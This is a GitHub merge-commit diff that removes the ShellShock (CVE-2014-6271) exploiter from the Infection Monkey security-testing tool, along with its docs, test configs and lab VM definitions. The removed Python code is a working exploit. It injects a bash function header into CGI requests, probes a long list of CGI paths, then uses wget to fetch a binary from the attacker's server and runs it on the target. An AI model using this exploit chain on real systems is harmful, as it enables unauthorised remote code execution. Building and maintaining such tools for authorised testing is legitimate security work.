Merge pull request #1735 from guardicore/1733-remove-shellshock-exploit

Remove shellshock exploit
Mike Salvatore 2022-02-23 10:27:22 -05:00 committed by GitHub
commit 57e6d0208d
26 changed files with 3 additions and 859 deletions


@ -45,6 +45,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
- MS08-067 (Conficker) exploiter. #1677
- Agent bootloader. #1676
- Zero Trust integration with ScoutSuite. #1669
- ShellShock exploiter. #1733
### Fixed
- A bug in network map page that caused delay of telemetry log loading. #1545


@ -46,7 +46,7 @@ The Infection Monkey uses the following techniques and exploits to propagate to
* SSH
* SMB
* WMI
* Shellshock
* Log4Shell
* Elastic Search (CVE-2015-1427)
* Weblogic server
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.


@ -26,7 +26,7 @@ You can take a look at [our roadmap](https://github.com/guardicore/monkey/projec
The best way to find weak spots in a network is by attacking it. The [*Adding Exploits*](./adding-exploits/) page will help you add exploits.
It's important to note that the Infection Monkey must be absolutely reliable. Otherwise, no one will use it, so avoid memory corruption exploits unless they're rock solid and focus on the logical vulns such as Shellshock.
It's important to note that the Infection Monkey must be absolutely reliable. Otherwise, no one will use it, so avoid memory corruption exploits unless they're rock solid and focus on the logical vulns such as Hadoop.
### Analysis plugins 🔬


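--- a/[path not shown on page]
+++ /dev/null
@@ -1,11 +0,0 @@
----
-title: "ShellShock"
-date: 2020-07-14T08:41:32+03:00
-draft: false
-tags: ["exploit", "linux"]
----
-### Description
-This exploit, CVE-2014-6271, is based on the [logic in NCC group's GitHub](https://github.com/nccgroup/shocker/blob/master/shocker.py).
-> In GNU Bash (through 4.3), processes trailing strings after function definitions in the values of environment variables allow remote attackers to execute arbitrary code via a crafted environment. This is demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients and other situations in which setting the environment occurs across a privilege boundary from Bash execution, AKA "ShellShock."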


@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",


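--- a/[path not shown on page]
+++ /dev/null
@@ -1,17 +0,0 @@
-from copy import copy
-from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
-from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
-class ShellShock(ConfigTemplate):
-config_values = copy(BaseTemplate.config_values)
-config_values.update(
-{
-"basic.exploiters.exploiter_classes": ["ShellShockExploiter"],
-"basic_network.scope.subnet_scan_list": ["10.2.2.8"],
-"internal.network.tcp_scanner.HTTP_PORTS": [80, 8080],
-"internal.network.tcp_scanner.tcp_target_ports": [],
-}
-)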


@ -17,7 +17,6 @@ GCP_TEST_MACHINE_LIST = {
"tunneling-12",
"weblogic-18",
"weblogic-19",
"shellshock-8",
"zerologon-25",
"drupal-28",
],


@ -20,7 +20,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
from envs.monkey_zoo.blackbox.config_templates.powershell_credentials_reuse import (
PowerShellCredentialsReuse,
)
from envs.monkey_zoo.blackbox.config_templates.shellshock import ShellShock
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
@ -200,9 +199,6 @@ class TestMonkeyBlackbox:
def test_weblogic_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")
def test_shellshock_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellshock_exploiter")
def test_log4j_solr_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(
island_client, Log4jSolr, "Log4Shell_Solr_exploiter"


@ -12,7 +12,6 @@ from envs.monkey_zoo.blackbox.config_templates.log4j_tomcat import Log4jTomcat
from envs.monkey_zoo.blackbox.config_templates.mssql import Mssql
from envs.monkey_zoo.blackbox.config_templates.performance import Performance
from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
from envs.monkey_zoo.blackbox.config_templates.shellshock import ShellShock
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
@ -45,7 +44,6 @@ CONFIG_TEMPLATES = [
Mssql,
Performance,
PowerShell,
ShellShock,
SmbMimikatz,
SmbPth,
Ssh,


@ -11,7 +11,6 @@ This document describes Infection Monkeys test network, how to deploy and use
[Nr. 3 Hadoop](#_Toc526517183)<br>
[Nr. 4 Elastic](#_Toc526517184)<br>
[Nr. 5 Elastic](#_Toc526517185)<br>
[Nr. 8 Shellshock](#_Toc536021461)<br>
[Nr. 9 Tunneling M1](#_Toc536021462)<br>
[Nr. 10 Tunneling M2](#_Toc536021463)<br>
[Nr. 11 SSH key steal](#_Toc526517190)<br>
@ -326,38 +325,6 @@ Update all requirements using deployment script:<br>
</tbody>
</table>
<table>
<thead>
<tr class="header">
<th><p><span id="_Toc536021461" class="anchor"></span>Nr. <strong>8</strong> Shellshock</p>
<p>(10.2.2.8)</p></th>
<th>(Vulnerable)</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>OS:</td>
<td><strong>Ubuntu 12.04 LTS x64</strong></td>
</tr>
<tr class="even">
<td>Software:</td>
<td>Apache2, bash 4.2.</td>
</tr>
<tr class="odd">
<td>Default servers port:</td>
<td>80</td>
</tr>
<tr class="even">
<td>Scan results:</td>
<td>Machine exploited using Shellshock exploiter</td>
</tr>
<tr class="odd">
<td>Notes:</td>
<td>Vulnerable app is under /cgi-bin/test.cgi</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr class="header">


@ -15,11 +15,6 @@ data "google_compute_image" "elastic-5" {
name = "elastic-5"
project = local.monkeyzoo_project
}
data "google_compute_image" "shellshock-8" {
name = "shellshock-8"
project = local.monkeyzoo_project
}
data "google_compute_image" "tunneling-9" {
name = "tunneling-9"
project = local.monkeyzoo_project


@ -106,21 +106,6 @@ resource "google_compute_instance_from_template" "elastic-5" {
}
}
resource "google_compute_instance_from_template" "shellshock-8" {
name = "${local.resource_prefix}shellshock-8"
source_instance_template = local.default_ubuntu
boot_disk{
initialize_params {
image = data.google_compute_image.shellshock-8.self_link
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.8"
}
}
resource "google_compute_instance_from_template" "tunneling-9" {
name = "${local.resource_prefix}tunneling-9"
source_instance_template = local.default_ubuntu


@ -27,7 +27,6 @@
"SSHExploiter",
"SmbExploiter",
"WmiExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",


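--- a/[path not shown on page]
+++ /dev/null
@@ -1,269 +0,0 @@
-# Implementation is based on shellshock script provided
-# https://github.com/nccgroup/shocker/blob/master/shocker.py
-import logging
-import string
-from random import SystemRandom
-import requests
-from common.utils.attack_utils import ScanStatus
-from infection_monkey.exploit.HostExploiter import HostExploiter
-from infection_monkey.exploit.shellshock_resources import CGI_FILES
-from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
-from infection_monkey.exploit.tools.http_tools import HTTPTools
-from infection_monkey.model import DROPPER_ARG
-from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
-from infection_monkey.utils.commands import build_monkey_commandline
-logger = logging.getLogger(__name__)
-TIMEOUT = 2
-TEST_COMMAND = "/bin/uname -a"
-DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
-LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
-class ShellShockExploiter(HostExploiter):
-_attacks = {"Content-type": "() { :;}; echo; "}
-_TARGET_OS_TYPE = ["linux"]
-_EXPLOITED_SERVICE = "Bash"
-def __init__(self, host):
-super(ShellShockExploiter, self).__init__(host)
-self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
-safe_random = SystemRandom()
-self.success_flag = "".join(
-safe_random.choice(string.ascii_uppercase + string.digits) for _ in range(20)
-)
-def _exploit_host(self):
-# start by picking ports
-candidate_services = {
-service: self.host.services[service]
-for service in self.host.services
-if ("name" in self.host.services[service])
-and (self.host.services[service]["name"] == "http")
-}
-valid_ports = [
-(port, candidate_services["tcp-" + str(port)]["data"][1])
-for port in self.HTTP
-if "tcp-" + str(port) in candidate_services
-]
-http_ports = [port[0] for port in valid_ports if not port[1]]
-https_ports = [port[0] for port in valid_ports if port[1]]
-logger.info(
-"Scanning %s, ports [%s] for vulnerable CGI pages"
-% (self.host, ",".join([str(port[0]) for port in valid_ports]))
-)
-attackable_urls = []
-# now for each port we want to check the entire URL list
-for port in http_ports:
-urls = self.check_urls(self.host.ip_addr, port)
-attackable_urls.extend(urls)
-for port in https_ports:
-urls = self.check_urls(self.host.ip_addr, port, is_https=True)
-attackable_urls.extend(urls)
-# now for each URl we want to try and see if it's attackable
-exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls]
-exploitable_urls = [url for url in exploitable_urls if url[0] is True]
-# we want to report all vulnerable URLs even if we didn't succeed
-self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls]
-# now try URLs until we install something on victim
-for _, url, header, exploit in exploitable_urls:
-logger.info("Trying to attack host %s with %s URL" % (self.host, url))
-# same attack script as sshexec
-# for any failure, quit and don't try other URLs
-if not self.host.os.get("type"):
-try:
-uname_os_attack = exploit + "/bin/uname -o"
-uname_os = self.attack_page(url, header, uname_os_attack)
-if "linux" in uname_os:
-self.host.os["type"] = "linux"
-else:
-logger.info("SSH Skipping unknown os: %s", uname_os)
-return False
-except Exception as exc:
-logger.debug(
-"Error running uname os command on victim %r: (%s)", self.host, exc
-)
-return False
-if not self.host.os.get("machine"):
-try:
-uname_machine_attack = exploit + "/bin/uname -m"
-uname_machine = self.attack_page(url, header, uname_machine_attack)
-if "" != uname_machine:
-self.host.os["machine"] = uname_machine.lower().strip()
-except Exception as exc:
-logger.debug(
-"Error running uname machine command on victim %r: (%s)", self.host, exc
-)
-return False
-# copy the monkey
-dropper_target_path_linux = self._config.dropper_target_path_linux
-src_path = get_target_monkey(self.host)
-if not src_path:
-logger.info("Can't find suitable monkey executable for host %r", self.host)
-return False
-if not self._create_lock_file(exploit, url, header):
-logger.info("Another monkey is running shellshock exploit")
-return True
-http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
-if not http_path:
-logger.debug("Exploiter ShellShock failed, http transfer creation failed.")
-return False
-download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux)
-download = exploit + download_command
-self.attack_page(
-url, header, download
-) # we ignore failures here since it might take more than TIMEOUT time
-http_thread.join(DOWNLOAD_TIMEOUT)
-http_thread.stop()
-self._remove_lock_file(exploit, url, header)
-if (http_thread.downloads != 1) or (
-"ELF"
-not in self.check_remote_file_exists(
-url, header, exploit, dropper_target_path_linux
-)
-):
-logger.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
-continue
-# turn the monkey into an executable
-chmod = "/bin/chmod +x %s" % dropper_target_path_linux
-run_path = exploit + chmod
-self.attack_page(url, header, run_path)
-T1222Telem(ScanStatus.USED, chmod, self.host).send()
-# run the monkey
-cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
-cmdline += build_monkey_commandline(
-self.host,
-get_monkey_depth() - 1,
-dropper_target_path_linux,
-)
-cmdline += " & "
-run_path = exploit + cmdline
-self.attack_page(url, header, run_path)
-logger.info(
-"Executed monkey '%s' on remote victim %r (cmdline=%r)",
-self._config.dropper_target_path_linux,
-self.host,
-cmdline,
-)
-if not (
-self.check_remote_file_exists(
-url, header, exploit, self._config.monkey_log_path_linux
-)
-):
-logger.info("Log file does not exist, monkey might not have run")
-continue
-self.add_executed_cmd(cmdline)
-return True
-return False
-@classmethod
-def check_remote_file_exists(cls, url, header, exploit, file_path):
-"""
-Checks if a remote file exists and returns the content if so
-file_path should be fully qualified
-"""
-cmdline = "/usr/bin/head -c 4 %s" % file_path
-run_path = exploit + cmdline
-resp = cls.attack_page(url, header, run_path)
-if resp:
-logger.info("File %s exists on remote host" % file_path)
-return resp
-def attempt_exploit(self, url, attacks=None):
-# Flag used to identify whether the exploit has successfully caused the
-# server to return a useful response
-if not attacks:
-attacks = self._attacks
-logger.debug("Attack Flag is: %s" % self.success_flag)
-logger.debug("Trying exploit for %s" % url)
-for header, exploit in list(attacks.items()):
-attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND
-result = self.attack_page(url, header, attack)
-if self.success_flag in result:
-logger.info("URL %s looks vulnerable" % url)
-return True, url, header, exploit
-else:
-logger.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
-return (False,)
-def _create_lock_file(self, exploit, url, header):
-if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
-return False
-cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE
-self.attack_page(url, header, cmd)
-return True
-def _remove_lock_file(self, exploit, url, header):
-cmd = exploit + "rm %s" % LOCK_HELPER_FILE
-self.attack_page(url, header, cmd)
-@staticmethod
-def attack_page(url, header, attack):
-result = ""
-try:
-logger.debug("Header is: %s" % header)
-logger.debug("Attack is: %s" % attack)
-r = requests.get( # noqa: DUO123
-url, headers={header: attack}, verify=False, timeout=TIMEOUT
-)
-result = r.content.decode()
-return result
-except requests.exceptions.RequestException as exc:
-logger.debug("Failed to run, exception %s" % exc)
-return result
-@staticmethod
-def check_urls(host, port, is_https=False, url_list=CGI_FILES):
-"""
-Checks if which urls exist
-:return: Sequence of URLs to try and attack
-"""
-attack_path = "http://"
-if is_https:
-attack_path = "https://"
-attack_path = attack_path + str(host) + ":" + str(port)
-reqs = []
-timeout = False
-attack_urls = [attack_path + url for url in url_list]
-for u in attack_urls:
-try:
-reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) # noqa: DUO123
-except requests.Timeout:
-timeout = True
-break
-if timeout:
-logger.debug(
-"Some connections timed out while sending request to potentially vulnerable "
-"urls."
-)
-valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
-urls = [resp.url for resp in valid_resps]
-return urls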


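--- a/[path not shown on page]
+++ /dev/null
@@ -1,408 +0,0 @@
-# resource for shellshock attack
-# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
-CGI_FILES = (
-r"/",
-r"/admin.cgi",
-r"/administrator.cgi",
-r"/agora.cgi",
-r"/aktivate/cgi-bin/catgy.cgi",
-r"/analyse.cgi",
-r"/apps/web/vs_diag.cgi",
-r"/axis-cgi/buffer/command.cgi",
-r"/b2-include/b2edit.showposts.php",
-r"/bandwidth/index.cgi",
-r"/bigconf.cgi",
-r"/cartcart.cgi",
-r"/cart.cgi",
-r"/ccbill/whereami.cgi",
-r"/cgi-bin/14all-1.1.cgi",
-r"/cgi-bin/14all.cgi",
-r"/cgi-bin/a1disp3.cgi",
-r"/cgi-bin/a1stats/a1disp3.cgi",
-r"/cgi-bin/a1stats/a1disp4.cgi",
-r"/cgi-bin/addbanner.cgi",
-r"/cgi-bin/add_ftp.cgi",
-r"/cgi-bin/adduser.cgi",
-r"/cgi-bin/admin/admin.cgi",
-r"/cgi-bin/admin.cgi",
-r"/cgi-bin/admin/getparam.cgi",
-r"/cgi-bin/adminhot.cgi",
-r"/cgi-bin/admin.pl",
-r"/cgi-bin/admin/setup.cgi",
-r"/cgi-bin/adminwww.cgi",
-r"/cgi-bin/af.cgi",
-r"/cgi-bin/aglimpse.cgi",
-r"/cgi-bin/alienform.cgi",
-r"/cgi-bin/AnyBoard.cgi",
-r"/cgi-bin/architext_query.cgi",
-r"/cgi-bin/astrocam.cgi",
-r"/cgi-bin/AT-admin.cgi",
-r"/cgi-bin/AT-generate.cgi",
-r"/cgi-bin/auction/auction.cgi",
-r"/cgi-bin/auktion.cgi",
-r"/cgi-bin/ax-admin.cgi",
-r"/cgi-bin/ax.cgi",
-r"/cgi-bin/axs.cgi",
-r"/cgi-bin/badmin.cgi",
-r"/cgi-bin/banner.cgi",
-r"/cgi-bin/bannereditor.cgi",
-r"/cgi-bin/bb-ack.sh",
-r"/cgi-bin/bb-histlog.sh",
-r"/cgi-bin/bb-hist.sh",
-r"/cgi-bin/bb-hostsvc.sh",
-r"/cgi-bin/bb-replog.sh",
-r"/cgi-bin/bb-rep.sh",
-r"/cgi-bin/bbs_forum.cgi",
-r"/cgi-bin/bigconf.cgi",
-r"/cgi-bin/bizdb1-search.cgi",
-r"/cgi-bin/blog/mt-check.cgi",
-r"/cgi-bin/blog/mt-load.cgi",
-r"/cgi-bin/bnbform.cgi",
-r"/cgi-bin/book.cgi",
-r"/cgi-bin/boozt/admin/index.cgi",
-r"/cgi-bin/bsguest.cgi",
-r"/cgi-bin/bslist.cgi",
-r"/cgi-bin/build.cgi",
-r"/cgi-bin/bulk/bulk.cgi",
-r"/cgi-bin/cached_feed.cgi",
-r"/cgi-bin/cachemgr.cgi",
-r"/cgi-bin/calendar/index.cgi",
-r"/cgi-bin/cartmanager.cgi",
-r"/cgi-bin/cbmc/forums.cgi",
-r"/cgi-bin/ccvsblame.cgi",
-r"/cgi-bin/c_download.cgi",
-r"/cgi-bin/cgforum.cgi",
-r"/cgi-bin/.cgi",
-r"/cgi-bin/cgi_process",
-r"/cgi-bin/classified.cgi",
-r"/cgi-bin/classifieds.cgi",
-r"/cgi-bin/classifieds/classifieds.cgi",
-r"/cgi-bin/classifieds/index.cgi",
-r"/cgi-bin/.cobalt/alert/service.cgi",
-r"/cgi-bin/.cobalt/message/message.cgi",
-r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi",
-r"/cgi-bin/commandit.cgi",
-r"/cgi-bin/commerce.cgi",
-r"/cgi-bin/common/listrec.pl",
-r"/cgi-bin/compatible.cgi",
-r"/cgi-bin/Count.cgi",
-r"/cgi-bin/csChatRBox.cgi",
-r"/cgi-bin/csGuestBook.cgi",
-r"/cgi-bin/csLiveSupport.cgi",
-r"/cgi-bin/CSMailto.cgi",
-r"/cgi-bin/CSMailto/CSMailto.cgi",
-r"/cgi-bin/csNews.cgi",
-r"/cgi-bin/csNewsPro.cgi",
-r"/cgi-bin/csPassword.cgi",
-r"/cgi-bin/csPassword/csPassword.cgi",
-r"/cgi-bin/csSearch.cgi",
-r"/cgi-bin/csv_db.cgi",
-r"/cgi-bin/cvsblame.cgi",
-r"/cgi-bin/cvslog.cgi",
-r"/cgi-bin/cvsquery.cgi",
-r"/cgi-bin/cvsqueryform.cgi",
-r"/cgi-bin/day5datacopier.cgi",
-r"/cgi-bin/day5datanotifier.cgi",
-r"/cgi-bin/db_manager.cgi",
-r"/cgi-bin/dbman/db.cgi",
-r"/cgi-bin/dcforum.cgi",
-r"/cgi-bin/dcshop.cgi",
-r"/cgi-bin/dfire.cgi",
-r"/cgi-bin/diagnose.cgi",
-r"/cgi-bin/dig.cgi",
-r"/cgi-bin/directorypro.cgi",
-r"/cgi-bin/download.cgi",
-r"/cgi-bin/e87_Ba79yo87.cgi",
-r"/cgi-bin/emu/html/emumail.cgi",
-r"/cgi-bin/emumail.cgi",
-r"/cgi-bin/emumail/emumail.cgi",
-r"/cgi-bin/enter.cgi",
-r"/cgi-bin/environ.cgi",
-r"/cgi-bin/ezadmin.cgi",
-r"/cgi-bin/ezboard.cgi",
-r"/cgi-bin/ezman.cgi",
-r"/cgi-bin/ezshopper2/loadpage.cgi",
-r"/cgi-bin/ezshopper3/loadpage.cgi",
-r"/cgi-bin/ezshopper/loadpage.cgi",
-r"/cgi-bin/ezshopper/search.cgi",
-r"/cgi-bin/faqmanager.cgi",
-r"/cgi-bin/FileSeek2.cgi",
-r"/cgi-bin/FileSeek.cgi",
-r"/cgi-bin/finger.cgi",
-r"/cgi-bin/flexform.cgi",
-r"/cgi-bin/fom.cgi",
-r"/cgi-bin/fom/fom.cgi",
-r"/cgi-bin/FormHandler.cgi",
-r"/cgi-bin/FormMail.cgi",
-r"/cgi-bin/gbadmin.cgi",
-r"/cgi-bin/gbook/gbook.cgi",
-r"/cgi-bin/generate.cgi",
-r"/cgi-bin/getdoc.cgi",
-r"/cgi-bin/gH.cgi",
-r"/cgi-bin/gm-authors.cgi",
-r"/cgi-bin/gm.cgi",
-r"/cgi-bin/gm-cplog.cgi",
-r"/cgi-bin/guestbook.cgi",
-r"/cgi-bin/handler",
-r"/cgi-bin/handler.cgi",
-r"/cgi-bin/handler/netsonar",
-r"/cgi-bin/hitview.cgi",
-r"/cgi-bin/hsx.cgi",
-r"/cgi-bin/html2chtml.cgi",
-r"/cgi-bin/html2wml.cgi",
-r"/cgi-bin/htsearch.cgi",
-r"/cgi-bin/hw.sh", # testing
-r"/cgi-bin/icat",
-r"/cgi-bin/if/admin/nph-build.cgi",
-r"/cgi-bin/ikonboard/help.cgi",
-r"/cgi-bin/ImageFolio/admin/admin.cgi",
-r"/cgi-bin/imageFolio.cgi",
-r"/cgi-bin/index.cgi",
-r"/cgi-bin/infosrch.cgi",
-r"/cgi-bin/jammail.pl",
-r"/cgi-bin/journal.cgi",
-r"/cgi-bin/lastlines.cgi",
-r"/cgi-bin/loadpage.cgi",
-r"/cgi-bin/login.cgi",
-r"/cgi-bin/logit.cgi",
-r"/cgi-bin/log-reader.cgi",
-r"/cgi-bin/lookwho.cgi",
-r"/cgi-bin/lwgate.cgi",
-r"/cgi-bin/MachineInfo",
-r"/cgi-bin/MachineInfo",
-r"/cgi-bin/magiccard.cgi",
-r"/cgi-bin/mail/emumail.cgi",
-r"/cgi-bin/maillist.cgi",
-r"/cgi-bin/mailnews.cgi",
-r"/cgi-bin/mail/nph-mr.cgi",
-r"/cgi-bin/main.cgi",
-r"/cgi-bin/main_menu.pl",
-r"/cgi-bin/man.sh",
-r"/cgi-bin/mini_logger.cgi",
-r"/cgi-bin/mmstdod.cgi",
-r"/cgi-bin/moin.cgi",
-r"/cgi-bin/mojo/mojo.cgi",
-r"/cgi-bin/mrtg.cgi",
-r"/cgi-bin/mt.cgi",
-r"/cgi-bin/mt/mt.cgi",
-r"/cgi-bin/mt/mt-check.cgi",
-r"/cgi-bin/mt/mt-load.cgi",
-r"/cgi-bin/mt-static/mt-check.cgi",
-r"/cgi-bin/mt-static/mt-load.cgi",
-r"/cgi-bin/musicqueue.cgi",
-r"/cgi-bin/myguestbook.cgi",
-r"/cgi-bin/.namazu.cgi",
-r"/cgi-bin/nbmember.cgi",
-r"/cgi-bin/netauth.cgi",
-r"/cgi-bin/netpad.cgi",
-r"/cgi-bin/newsdesk.cgi",
-r"/cgi-bin/nlog-smb.cgi",
-r"/cgi-bin/nph-emumail.cgi",
-r"/cgi-bin/nph-exploitscanget.cgi",
-r"/cgi-bin/nph-publish.cgi",
-r"/cgi-bin/nph-test.cgi",
-r"/cgi-bin/pagelog.cgi",
-r"/cgi-bin/pbcgi.cgi",
-r"/cgi-bin/perlshop.cgi",
-r"/cgi-bin/pfdispaly.cgi",
-r"/cgi-bin/pfdisplay.cgi",
-r"/cgi-bin/phf.cgi",
-r"/cgi-bin/photo/manage.cgi",
-r"/cgi-bin/photo/protected/manage.cgi",
-r"/cgi-bin/php-cgi",
-r"/cgi-bin/php.cgi",
-r"/cgi-bin/php.fcgi",
-r"/cgi-bin/ping.sh",
-r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi",
-r"/cgi-bin/pollssi.cgi",
-r"/cgi-bin/postcards.cgi",
-r"/cgi-bin/powerup/r.cgi",
-r"/cgi-bin/printenv",
-r"/cgi-bin/probecontrol.cgi",
-r"/cgi-bin/profile.cgi",
-r"/cgi-bin/publisher/search.cgi",
-r"/cgi-bin/quickstore.cgi",
-r"/cgi-bin/quizme.cgi",
-r"/cgi-bin/ratlog.cgi",
-r"/cgi-bin/r.cgi",
-r"/cgi-bin/register.cgi",
-r"/cgi-bin/replicator/webpage.cgi/",
-r"/cgi-bin/responder.cgi",
-r"/cgi-bin/robadmin.cgi",
-r"/cgi-bin/robpoll.cgi",
-r"/cgi-bin/rtpd.cgi",
-r"/cgi-bin/sbcgi/sitebuilder.cgi",
-r"/cgi-bin/scoadminreg.cgi",
-r"/cgi-bin-sdb/printenv",
-r"/cgi-bin/sdbsearch.cgi",
-r"/cgi-bin/search",
-r"/cgi-bin/search.cgi",
-r"/cgi-bin/search/search.cgi",
-r"/cgi-bin/sendform.cgi",
-r"/cgi-bin/shop.cgi",
-r"/cgi-bin/shopper.cgi",
-r"/cgi-bin/shopplus.cgi",
-r"/cgi-bin/showcheckins.cgi",
-r"/cgi-bin/simplestguest.cgi",
-r"/cgi-bin/simplestmail.cgi",
-r"/cgi-bin/smartsearch.cgi",
-r"/cgi-bin/smartsearch/smartsearch.cgi",
-r"/cgi-bin/snorkerz.bat",
-r"/cgi-bin/snorkerz.bat",
-r"/cgi-bin/snorkerz.cmd",
-r"/cgi-bin/snorkerz.cmd",
-r"/cgi-bin/sojourn.cgi",
-r"/cgi-bin/spin_client.cgi",
-r"/cgi-bin/start.cgi",
-r"/cgi-bin/status",
-r"/cgi-bin/status_cgi",
-r"/cgi-bin/store/agora.cgi",
-r"/cgi-bin/store.cgi",
-r"/cgi-bin/store/index.cgi",
-r"/cgi-bin/survey.cgi",
-r"/cgi-bin/sync.cgi",
-r"/cgi-bin/talkback.cgi",
-r"/cgi-bin/technote/main.cgi",
-r"/cgi-bin/test2.pl",
-r"/cgi-bin/test-cgi",
-r"/cgi-bin/test.cgi",
-r"/cgi-bin/testing_whatever",
-r"/cgi-bin/test/test.cgi",
-r"/cgi-bin/tidfinder.cgi",
-r"/cgi-bin/tigvote.cgi",
-r"/cgi-bin/title.cgi",
-r"/cgi-bin/top.cgi",
-r"/cgi-bin/traffic.cgi",
-r"/cgi-bin/troops.cgi",
-r"/cgi-bin/ttawebtop.cgi/",
-r"/cgi-bin/ultraboard.cgi",
-r"/cgi-bin/upload.cgi",
-r"/cgi-bin/urlcount.cgi",
-r"/cgi-bin/viewcvs.cgi",
-r"/cgi-bin/view_help.cgi",
-r"/cgi-bin/viralator.cgi",
-r"/cgi-bin/virgil.cgi",
-r"/cgi-bin/vote.cgi",
-r"/cgi-bin/vpasswd.cgi",
-r"/cgi-bin/way-board.cgi",
-r"/cgi-bin/way-board/way-board.cgi",
-r"/cgi-bin/webbbs.cgi",
-r"/cgi-bin/webcart/webcart.cgi",
-r"/cgi-bin/webdist.cgi",
-r"/cgi-bin/webif.cgi",
-r"/cgi-bin/webmail/html/emumail.cgi",
-r"/cgi-bin/webmap.cgi",
-r"/cgi-bin/webspirs.cgi",
-r"/cgi-bin/Web_Store/web_store.cgi",
-r"/cgi-bin/whois.cgi",
-r"/cgi-bin/whois_raw.cgi",
-r"/cgi-bin/whois/whois.cgi",
-r"/cgi-bin/wrap",
-r"/cgi-bin/wrap.cgi",
-r"/cgi-bin/wwwboard.cgi.cgi",
-r"/cgi-bin/YaBB/YaBB.cgi",
-r"/cgi-bin/zml.cgi",
-r"/cgi-mod/index.cgi",
-r"/cgis/wwwboard/wwwboard.cgi",
-r"/cgi-sys/addalink.cgi",
-r"/cgi-sys/defaultwebpage.cgi",
-r"/cgi-sys/domainredirect.cgi",
-r"/cgi-sys/entropybanner.cgi",
-r"/cgi-sys/entropysearch.cgi",
-r"/cgi-sys/FormMail-clone.cgi",
-r"/cgi-sys/helpdesk.cgi",
-r"/cgi-sys/mchat.cgi",
-r"/cgi-sys/randhtml.cgi",
-r"/cgi-sys/realhelpdesk.cgi",
-r"/cgi-sys/realsignup.cgi",
-r"/cgi-sys/signup.cgi",
-r"/connector.cgi",
-r"/cp/rac/nsManager.cgi",
-r"/create_release.sh",
-r"/CSNews.cgi",
-r"/csPassword.cgi",
-r"/dcadmin.cgi",
-r"/dcboard.cgi",
-r"/dcforum.cgi",
-r"/dcforum/dcforum.cgi",
-r"/debuff.cgi",
-r"/debug.cgi",
-r"/details.cgi",
-r"/edittag/edittag.cgi",
-r"/emumail.cgi",
-r"/enter_buff.cgi",
-r"/enter_bug.cgi",
-r"/ez2000/ezadmin.cgi",
-r"/ez2000/ezboard.cgi",
-r"/ez2000/ezman.cgi",
-r"/fcgi-bin/echo",
-r"/fcgi-bin/echo",
-r"/fcgi-bin/echo2",
-r"/fcgi-bin/echo2",
-r"/Gozila.cgi",
-r"/hitmatic/analyse.cgi",
-r"/hp_docs/cgi-bin/index.cgi",
-r"/html/cgi-bin/cgicso",
-r"/html/cgi-bin/cgicso",
-r"/index.cgi",
-r"/info.cgi",
-r"/infosrch.cgi",
-r"/login.cgi",
-r"/mailview.cgi",
-r"/main.cgi",
-r"/megabook/admin.cgi",
-r"/ministats/admin.cgi",
-r"/mods/apage/apage.cgi",
-r"/_mt/mt.cgi",
-r"/musicqueue.cgi",
-r"/ncbook.cgi",
-r"/newpro.cgi",
-r"/newsletter.sh",
-r"/oem_webstage/cgi-bin/oemapp_cgi",
-r"/page.cgi",
-r"/parse_xml.cgi",
-r"/photodata/manage.cgi",
-r"/photo/manage.cgi",
-r"/print.cgi",
-r"/process_buff.cgi",
-r"/process_bug.cgi",
-r"/pub/english.cgi",
-r"/quikmail/nph-emumail.cgi",
-r"/quikstore.cgi",
-r"/reviews/newpro.cgi",
-r"/ROADS/cgi-bin/search.pl",
-r"/sample01.cgi",
-r"/sample02.cgi",
-r"/sample03.cgi",
-r"/sample04.cgi",
-r"/sampleposteddata.cgi",
-r"/scancfg.cgi",
-r"/scancfg.cgi",
-r"/servers/link.cgi",
-r"/setpasswd.cgi",
-r"/SetSecurity.shm",
-r"/shop/member_html.cgi",
-r"/shop/normal_html.cgi",
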